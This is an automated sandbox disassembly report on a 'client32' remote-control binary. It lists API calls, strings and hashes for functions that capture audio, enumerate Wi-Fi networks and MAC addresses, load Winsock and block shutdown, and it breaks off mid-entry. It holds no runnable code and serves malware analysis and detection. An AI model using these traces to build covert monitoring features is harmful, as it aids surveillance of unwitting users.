Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
API String ID: 3042533059-2538903574
Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51

Function 1100B330 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,7E4636A2), ref: 1100B3BB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
_calloc.LIBCMT ref: 1100B409
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
LeaveCriticalSection.KERNEL32(?), ref: 1100B469

Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,7E4636A2), ref: 1100ACA4
Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95

LeaveCriticalSection.KERNEL32(?), ref: 1100B48E

Strings

Vista new pAudioCap=%p, xrefs: 1100B4F3
Audio, xrefs: 1100B367
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
\\.\NSAudioFilter, xrefs: 1100B3D0
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
DisableSounds, xrefs: 1100B362
Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
InitCaptureSounds NT6, xrefs: 1100B4AE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 2005284756-2362500394
Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1

Function 11103110 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1110313E
EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
GetTickCount.KERNEL32 ref: 1110314D
GetTickCount.KERNEL32 ref: 111031A0
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
GetTickCount.KERNEL32 ref: 111031DA
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B

Strings

Warning. simap lock held for %d ms, xrefs: 111031B9, 111031F3
Warning. took %d ms to get simap lock, xrefs: 11103159
psi, xrefs: 11103193, 11103248, 1110328E
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 1110318E, 11103243, 11103289
info. new psi(%d) = %x, xrefs: 111032C1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 3572004736-3013461081
Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1

Function 1103B020 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1103B15F
Sleep.KERNEL32(000001F4), ref: 1103B1A4
PostMessageA.USER32(00010480,00000010,00000000,00000000), ref: 1103B1CF

Strings

Client, xrefs: 1103B05F, 1103B07C, 1103B099, 1103B0D5, 1103B18F
DisableShutDown, xrefs: 1103B173
AssertOnReboot, xrefs: 1103B102
GPFOnReboot, xrefs: 1103B133
sd - Post WM_CLOSE to %08x, xrefs: 1103B1B6
DisablePowerOff, xrefs: 1103B077
CLTCONN.CPP, xrefs: 1103B11D
DisableReboot, xrefs: 1103B094
FALSE || !"assertOnReboot", xrefs: 1103B122
DisableLogoff, xrefs: 1103B05A, 1103B0D0, 1103B18A
_debug, xrefs: 1103B107, 1103B138

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountMessagePostSleepTick
String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
API String ID: 507213284-4185502373
Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355

Function 11157010 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
std::exception::exception.LIBCMT ref: 111570CD
__CxxThrowException@8.LIBCMT ref: 111570E2

Strings

WlanCloseHandle, xrefs: 1115707E
WlanFreeMemory, xrefs: 111570AE
WlanEnumInterfaces, xrefs: 1115708E
WlanOpenHandle, xrefs: 1115706E
WlanGetAvailableNetworkList, xrefs: 1115709E
wlanapi.dll, xrefs: 11157053

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 1463381176-1736626566
Opcode ID: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
Opcode Fuzzy Hash: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91

Function 685A0F59 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 263COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

_memset.LIBCMT ref: 685A0FAD
EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1293
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A12E3
EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1316
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A132D
std::exception::exception.LIBCMT ref: 685A135B
__CxxThrowException@8.LIBCMT ref: 685A1376

Strings

MORE, xrefs: 685A107F
RESULT, xrefs: 685A1061
TIM, xrefs: 685A1142
b, xrefs: 685A12CE
TXT, xrefs: 685A1100
END_REC, xrefs: 685A1250
UID, xrefs: 685A10BE
FLG, xrefs: 685A1163
ENC, xrefs: 685A10DF
CAP, xrefs: 685A1121

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
API String ID: 275297366-914382535
Opcode ID: 60a338348bb067c085c4a2ca94c1a4a5e1fac875370aa5f77a00b5083bbbe49e
Instruction ID: 2e46e4b7baf199c2889004868545db68cd61fbd7e5d763fd9552678f82cbe9ef
Opcode Fuzzy Hash: 60a338348bb067c085c4a2ca94c1a4a5e1fac875370aa5f77a00b5083bbbe49e
Instruction Fuzzy Hash: 1D91C2B5D40259AFDF20DFA49CC1AFEB6B4AF44204F80057AD85AE6205F7315F88CB66

Function 11027130 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
GetSystemMetrics.USER32(00000032), ref: 110271EE
GetSystemMetrics.USER32(00000031), ref: 110271F3
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
LoadIconA.USER32(11000000,00000491), ref: 1102721B
GetSystemMetrics.USER32(00000032), ref: 1102722A
GetSystemMetrics.USER32(00000031), ref: 1102722F
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240

Strings

product, xrefs: 11027168
_License, xrefs: 1102716D
PCIRES, xrefs: 110271BB
AdminUserAcknowledge, xrefs: 1102729B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$PCIRES$_License$product
API String ID: 1946015-1270847556
Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2

Function 685B0970 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B09A6
GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 685B09C3
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 685B09CD
GetProcAddress.KERNEL32(00000000,socket), ref: 685B09DB
GetProcAddress.KERNEL32(00000000,closesocket), ref: 685B09E9
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 685B09F7
FreeLibrary.KERNEL32(00000000), ref: 685B0A6C

Strings

WSAStartup, xrefs: 685B09BD
ws2_32.dll, xrefs: 685B098B
WSACleanup, xrefs: 685B09C5
closesocket, xrefs: 685B09DD
WSAIoctl, xrefs: 685B09EB
socket, xrefs: 685B09CF

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
API String ID: 2449869053-2279908372
Opcode ID: 8b909201f7fafeeffb218bc709d001203d038451e2502fc5eccc32dcd3132a14
Instruction ID: 349decaf8d2eccb1c290a010f1d3b8a54825143aac5409a6fda2c076dcfbee9c
Opcode Fuzzy Hash: 8b909201f7fafeeffb218bc709d001203d038451e2502fc5eccc32dcd3132a14
Instruction Fuzzy Hash: 85318971B01218AFDB14AB788C59FEE7778EF86310F414195FD09A7280DA705D418F95

Function 685A7E60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A7E8D
LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,00000000,00000000,00000010,?,?), ref: 685A7E9A
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7EB3
_malloc.LIBCMT ref: 685A7ED8
_memmove.LIBCMT ref: 685A7F20
_free.LIBCMT ref: 685A7F31
FreeLibrary.KERNEL32(00000000), ref: 685A7F3D
_memmove.LIBCMT ref: 685A7F5F

Strings

iphlpapi.dll, xrefs: 685A7E95
GetAdaptersInfo, xrefs: 685A7EAD
cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH, xrefs: 685A7E78
macaddr.cpp, xrefs: 685A7E73

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
API String ID: 3275914093-1155488092
Opcode ID: c9860b8c1a71741edae8e440fe7680b46d631933e06bdbb515427f7cd1afa361
Instruction ID: 844c46a3c1b9a33321c390daa5a513842b8854f749ec74c3a715f680b9866e03
Opcode Fuzzy Hash: c9860b8c1a71741edae8e440fe7680b46d631933e06bdbb515427f7cd1afa361
Instruction Fuzzy Hash: B83181B6E00208ABDB009EB4DCC4DAE7778AB84354F804565FD68E7244E730EE4487A5

Function 1100D220 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D291

Strings

NotFound, xrefs: 1100D26A
BadParam, xrefs: 1100D271
RequiresVista, xrefs: 1100D239
CannotGetFunc, xrefs: 1100D24E
Exception, xrefs: 1100D278, 1100D286
AlreadyStarted, xrefs: 1100D255
CannotLoadDll, xrefs: 1100D240
DllInitFailed, xrefs: 1100D247
NoCapClients, xrefs: 1100D263
AlreadyStopped, xrefs: 1100D25C
StillInstances, xrefs: 1100D27F
Unknown error %d, xrefs: 1100D287

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296

Function 110FD230 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 247libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
_memset.LIBCMT ref: 110FD3E2
